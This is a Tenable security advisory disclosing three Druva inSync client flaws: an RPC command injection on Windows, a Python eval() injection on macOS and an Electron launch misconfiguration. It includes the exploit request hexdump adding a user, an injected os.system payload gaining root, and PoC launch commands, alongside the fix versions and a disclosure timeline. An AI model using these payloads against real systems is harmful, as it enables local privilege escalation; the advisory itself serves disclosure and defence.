Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Druva inSync Client Multiple Vulnerabilities

High

Synopsis

CVE-2019-3999: Druva inSync Client inSyncCPHwnet64.exe RPC Request Type 5 Unauthenticated OS Command Injection - Local Privilege Escalation (Windows)

The Windows Druva inSync Client Service (inSyncCPHwnet64.exe) contains a command injection vulnerability that can be exploited by a local, unauthenticated attacker to execute OS commands with SYSTEM privileges.

When processing RPC type 5 requests over TCP port 6064, inSyncCPHwnet64.exe does not properly validate request data prior to passing it to the CreateProcessW() function. By sending a crafted RPC request, an attacker can elevate privileges to SYSTEM.

Proof of Concept

See github

Below is a hexdump of the request sent to exploit this vulnerability and execute the command "net user /add tenable"

00000000  69 6e 53 79 6e 63 20 50  48 43 20 52 50 43 57 5b   inSync P HC RPCW[
00000010  76 30 30 30 32 5d                                  v0002]
00000016  05 00 00 00                                        ....
0000001A  2a 00 00 00                                        *...
0000001E  6e 00 65 00 74 00 20 00  75 00 73 00 65 00 72 00   n.e.t. . u.s.e.r.
0000002E  20 00 2f 00 61 00 64 00  64 00 20 00 74 00 65 00    ./.a.d. d. .t.e.
0000003E  6e 00 61 00 62 00 6c 00  65 00                     n.a.b.l. e.

And here is the corresponding log entry in inSyncCPH.log showing a successful exploitation attempt. Notice that the command 'net user /add tenable' was executed.

20/12/2019 11:17:38	:Got a request to create a process for sysstate. converted: 21, cmd: net user /add tenable
20/12/2019 11:17:38	:Exit code for sysstate process is 0 and return value is 1

CVE-2019-4000: Druva inSync Client inSyncDecommission daemon.set_file_acl Authenticated Python Code Injection (Mac OS)

The inSyncDecommission process is susceptible to Python code injection via the RPC service available over TCP port 6059. Specifically, the daemon.set_file_acl method passes unvalidated input to the Python eval() function. This vulnerability can be exploited by a local, authenticated attacker to execute arbitrary Python code with root privileges.

After decompiling the daemon_set_file_acl function, we believe the function source code to be as follows. Notice the acl argument is passed to eval() without validation:

def daemon_set_file_acl(unknown, fname, acl, user_uid, user_gid):
    try:
        (mode, uid, gid) = eval(acl)	#  unsafe call to eval()

        if not stat.S_ISLNK(mode):
            os.chmod(fname, mode)

        if uid:
            os.lchown(fname, user_uid, user_gid)
        else:
            os.lchown(fname, uid, gid)
    except Exception as fault:
        SyncLog.error('Could not set acl on file %s, error: %s', fname, str(fault))
        SyncLog.dtraceback(fault)
        raise

    return None

Proof of Concept

See github

And here is a sample invocation of the PoC. Notice that ROOT_OWNED was created, and it's owned by root.:

scooby$ ls -l /private/tmp
total 0

scooby$ python insync_rpc_set_acl_auth_exploit.py 7u0ipcrhaudqbchfptnx "os.system('touch /tmp/ROOT_OWNED')"

scooby$ ls -l /private/tmp
total 0
-rw-r--r--  1 root   wheel       0 Dec 27 11:15 ROOT_OWNED

CVE-2019-4001: Electron App Command Line Argument Misconfiguration

The inSync Electron application is configured in such a way that a malicious local user can execute arbitrary NodeJS code in the context of the inSync client process. An attacker can accomplish this by launching inSync with a URL parameter pointing to an attacker-controlled HTML file containing NodeJS code.

Please note that this file can point to a remote location as well (e.g. http://12.34.56.78/index.html).

Also, note that this vulnerability may be used to read service tokens from the MacOS keychain, and subsequently, it may be exploited in combination with CVE-2019-4000 to escalate privileges to root.

Below I have pasted a vulnerable code snippet in main.js. Notice how the command line argument value is assigned to inSyncURL without any validation. This allows the Electron application to execute any specified file.

if (os.platform() == 'darwin') {
        if (process.argv[3] == "no_rfs") {// TODO launch if no param has been given
            inSyncURL = process.argv[1]
            windowType = process.argv[2]
        } else { 
            inSyncURL = process.argv[2]
            windowType = process.argv[3]
        }   
    } else {
        if(process.argv[1] == null) {
            var child = spawn(path.join(__dirname, '..', '..', '..', '..', 'inSyncAgent.exe'), ['configure'], {detached: true});
            app.quit()
            return
        }   

        inSyncURL= process.argv[1]
        windowType = process.argv[2]
    }
Proof of Concept
(Mac OS)
open /Applications/Druva\ inSync.app/Contents/Resources/inSync.app --args "file:///Users/myuser/index.html" main no_rfs

(Windows)
"C:\Program Files (x86)\Druva\inSync\electron\inSyncClient\inSync.exe" file://C:/Users/myuser/index.html main no_rfs

Solution

Druva inSync version 6.6.0 fixes CVE-2019-3999 and CVE-2019-4000, and version 6.6.2 fixes CVE-2019-4001.

Disclosure Timeline

12/26/2019 - Tenable contacts [email protected] to clarify proper method of disclosing vulnerabilities. Asks for PGP key.
12/26/2019 - Druva CISO (Tom Conklin) responds via LinkedIn message that he will send a PGP key today.
12/26/2019 - Druva sends PGP key.
12/27/2019 - Tenable sends vulnerability details and PoC's to Druva. 90-day date is 03/26/2020.
12/27/2019 - Druva confirms receipt of the report. Assigns ticket.
01/02/2020 - Tenable acks.
01/07/2020 - Druva asks for clarification about the Windows vuln.
01/07/2020 - Tenable provides clarification.
01/21/2020 - Tenable asks for an update.
01/21/2020 - Druva is working on a fix and confirmatory testing in parallel. They will update us.
01/22/2020 - Druva indicates they have fixed issue 1, but are still working to fix the others.
01/22/2020 - Tenable asks for clarification. Reiterates our vulnerability disclosure policy.
01/22/2020 - Druva has not released yet. Tentative February release.
01/23/2020 - Tenable acknowledges. Thanks for clarification.
02/06/2020 - Tenable asks for an update.
02/07/2020 - Druva's response: "Greetings ...........!!!!!! We will let you know about patch release , as our team is working on it on priority basis."
02/07/2020 - Tenable asks for a more specific remediation timeline. The previous response does not reinforce Druva's statement from 01/22/2020.
02/07/2020 - Druva reaffirms a February release. Tentatively mid to third week of the month depending on final QA results.
02/11/2020 - Tenable thanks Druva for the update.
02/14/2020 - Druva says they will be releasing a new client over the weekend (correcting 2 of 3 bugs). They have fixed everything but the Electron app misconfiguration, but they plan to fix it within the timeline.
02/18/2020 - Tenable thanks Druva for the update.
02/25/2020 - Tenable notifies Druva of our research advisory TRA-2020-12.
02/25/2020 - Druva thanks Tenable for the update.
03/19/2020 - Tenable asks for an update. Asks if they will be able to make the March 26 timeline.
03/19/2020 - Druva says "yes" and they are currently completing testing.
03/24/2020 - Druva notifies Tenable that version 6.6.2 fixed the Electron bug.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2020-12
Credit:
Chris Lyne
CVSSv2 Base / Temporal Score:
7.2 / 6.0
CVSSv2 Vector:
(AV:L/AC:L/Au:N/C:C/I:C/A:C)
Affected Products:
Druva inSync Client 6.5.0
Risk Factor:
High

Advisory Timeline

02/25/2020 - Advisory released
03/24/2020 - Updating with CVE-2019-4001

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training